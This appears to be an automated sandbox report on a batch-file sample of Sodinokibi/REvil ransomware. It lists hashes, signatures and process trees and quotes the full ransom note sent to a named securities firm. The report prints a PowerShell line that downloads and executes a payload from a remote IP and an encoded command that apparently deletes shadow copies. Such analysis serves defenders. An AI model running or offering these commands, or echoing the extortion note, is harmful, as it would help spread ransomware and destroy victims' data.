Analysis

  • max time kernel
    138s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    10-06-2020 16:10

General

  • Target

    3ba797dc80d83cbfa6d1a0d86e44b07f.bat

  • Size

    219B

  • MD5

    a492ab56e248bcde0ed2adcade97bcbb

  • SHA1

    bab084b7f54cee67117b058033b07cd52fe76647

  • SHA256

    8e2a0ee5856819aeb0f3e6c7e4815ad8491e263e90ef0ee6de93751a2e2aa455

  • SHA512

    3117a250261ea69a1d2ffd0cc04a7a7226ddc03f9d12a9bcb5eeff111677343c875341145328d4f5dd5c90de920363d47bf324c3fe119b00419f35b2ee688567

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/3ba797dc80d83cbfa6d1a0d86e44b07f

Extracted

Path

C:\5lh273zx0w-TrimegahSecurities-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome Trimegah Securities, PT TBK. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 5lh273zx0w. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7646EE8075DC4CF7 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. 
For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/7646EE8075DC4CF7 3) If you still have problems accessing the site, you can write to us at: [email protected], indicating the external IP address, country, key EO59IJ6aombDpXt0fRUA+bm2s7UObSdjSzWOdMLvyGbAnuYMSVHTnJvxyAgNYCto cksAF2gLAiXh0321xTnfMqmFyEf4MMc/SD61+PxwYdXq/hRsJkoZN9hU6RfTprMr breILaK35//ATrxuvw950yhLugilGZH6mW3o9Ti2MyqRAghR1Ld/MqCLWkWTIiXo wF79/msXxstn0EKoi2pkSfzN9qsn9w/atTmVIwrF37shTy+SJRG1yZSAqkTnET/F bKQLMrfT6Z6tRxwYVB768J9IbPZGtdpkH4AGljhZEYRzo9XCMnM5umqg/QOeIvPl KKk11QU3Iw0Q4oDlOgmD/qswlwh+8JiHZqAowKR+/EWK3Ym+j5lAf/KW+CfjemEo olhLdGezZfprIGp1AqkBrcp+IzUsp5H83vrMiosYx7IjHVzJcg4c9O3AwC6zSHS3 eXHcSqjubuysGQa1noezGTI4P7738uWjIyq8YJyznPi/k1nAI6onaG0CsPu3TIQR h4lyos67k6lTktTD20+XrI029q6pfTWBFRqDUF3wGv8x2f3BpSWxRi7biv1c0/lY KApRZX8cUHLaxNaq11IhUPB+J8qawYxvftkKHvCC7RNLfP7aWgQOgwVcOs0GL9gV uhZ/OKEfnIluP5Bg9twOeK++lnq+/6HZlydhK401dRHrOKda7JAADIj59l0bgFHp +dheWiBSlbtnpJjjsKUHjnVpqrYeGEkZxDIqbavexmGAZ7IEIBv/o3KSc6glAah0 oMglakCRl8/WFHEU67lBveoI7vrUDw9DdkI39tv7mPty1QX1FNyFGIBKW/uFC1J3 Cu6YPn5CW7ZFWPYPKInCABC9fukbT+063mWuvsRaz5MAJ2xb3MZIKhKyepLIz2UC zOndqyd+7fC2W0ZFP5vBcE9/BbJqKm+8inqaj/+7XlLJcW2+AcP+iaCuvsI27YPQ ssp22T+eAa2bSaod9oDMFWyiyly/sJCZuCx/nyDDfOCob6LykgDaJ5ymUR5a+mVk nAjQPdh61IgPzpig8cj4l93+KAbR+sbgpsYkcGIJeOo/p2aZMvsUg1IJrE9TJ0y9 1bakezX8jor3jq29raXiJAxkTzexjSTKXx9EVpJDOvpd+zYcvzhd7n6vEnIRWqZ4 HkZYcJ0/jTDbEkU5FVkqAlJqlV0SCmTAYvsi4RdwCuRccMxKopIaMjhS9QnGwehn NnGbK695z+Ko3bEnXXiIzdcc5i5b76vuPiAn6qG1Ze8RIwTfkotMs0lWR/38Ykaf GET1eeBnvDLgyTnv6sCVfAiykgvqZ/WrNENcouLftZzjsLBhq8eTCg== and extension 5lh273zx0w Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: EO59IJ6aombDpXt0fRUA+bm2s7UObSdjSzWOdMLvyGbAnuYMSVHTnJvxyAgNYCto cksAF2gLAiXh0321xTnfMqmFyEf4MMc/SD61+PxwYdXq/hRsJkoZN9hU6RfTprMr breILaK35//ATrxuvw950yhLugilGZH6mW3o9Ti2MyqRAghR1Ld/MqCLWkWTIiXo wF79/msXxstn0EKoi2pkSfzN9qsn9w/atTmVIwrF37shTy+SJRG1yZSAqkTnET/F bKQLMrfT6Z6tRxwYVB768J9IbPZGtdpkH4AGljhZEYRzo9XCMnM5umqg/QOeIvPl KKk11QU3Iw0Q4oDlOgmD/qswlwh+8JiHZqAowKR+/EWK3Ym+j5lAf/KW+CfjemEo olhLdGezZfprIGp1AqkBrcp+IzUsp5H83vrMiosYx7IjHVzJcg4c9O3AwC6zSHS3 eXHcSqjubuysGQa1noezGTI4P7738uWjIyq8YJyznPi/k1nAI6onaG0CsPu3TIQR h4lyos67k6lTktTD20+XrI029q6pfTWBFRqDUF3wGv8x2f3BpSWxRi7biv1c0/lY KApRZX8cUHLaxNaq11IhUPB+J8qawYxvftkKHvCC7RNLfP7aWgQOgwVcOs0GL9gV uhZ/OKEfnIluP5Bg9twOeK++lnq+/6HZlydhK401dRHrOKda7JAADIj59l0bgFHp +dheWiBSlbtnpJjjsKUHjnVpqrYeGEkZxDIqbavexmGAZ7IEIBv/o3KSc6glAah0 oMglakCRl8/WFHEU67lBveoI7vrUDw9DdkI39tv7mPty1QX1FNyFGIBKW/uFC1J3 Cu6YPn5CW7ZFWPYPKInCABC9fukbT+063mWuvsRaz5MAJ2xb3MZIKhKyepLIz2UC zOndqyd+7fC2W0ZFP5vBcE9/BbJqKm+8inqaj/+7XlLJcW2+AcP+iaCuvsI27YPQ ssp22T+eAa2bSaod9oDMFWyiyly/sJCZuCx/nyDDfOCob6LykgDaJ5ymUR5a+mVk nAjQPdh61IgPzpig8cj4l93+KAbR+sbgpsYkcGIJeOo/p2aZMvsUg1IJrE9TJ0y9 1bakezX8jor3jq29raXiJAxkTzexjSTKXx9EVpJDOvpd+zYcvzhd7n6vEnIRWqZ4 HkZYcJ0/jTDbEkU5FVkqAlJqlV0SCmTAYvsi4RdwCuRccMxKopIaMjhS9QnGwehn NnGbK695z+Ko3bEnXXiIzdcc5i5b76vuPiAn6qG1Ze8RIwTfkotMs0lWR/38Ykaf GET1eeBnvDLgyTnv6sCVfAiykgvqZ/WrNENcouLftZzjsLBhq8eTCg== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! !!! !!! ATTENTION !!! !!! 
We want to warn you that in case of refusal to pay, we will post your confidential files that we have downloaded for general access or will sell part of them in the shadow market.
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7646EE8075DC4CF7

http://decryptor.cc/7646EE8075DC4CF7

Signatures

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies system certificate store 2 TTPs 14 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs
  • Blacklisted process makes network request 138 IoCs
  • Drops file in Program Files directory 32 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\3ba797dc80d83cbfa6d1a0d86e44b07f.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1008
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/3ba797dc80d83cbfa6d1a0d86e44b07f');Invoke-RVAOEIZDHXXE;Start-Sleep -s 10000"
      2⤵
      • Sets desktop wallpaper using registry
      • Drops file in System32 directory
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      PID:1424
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1548
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:796

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms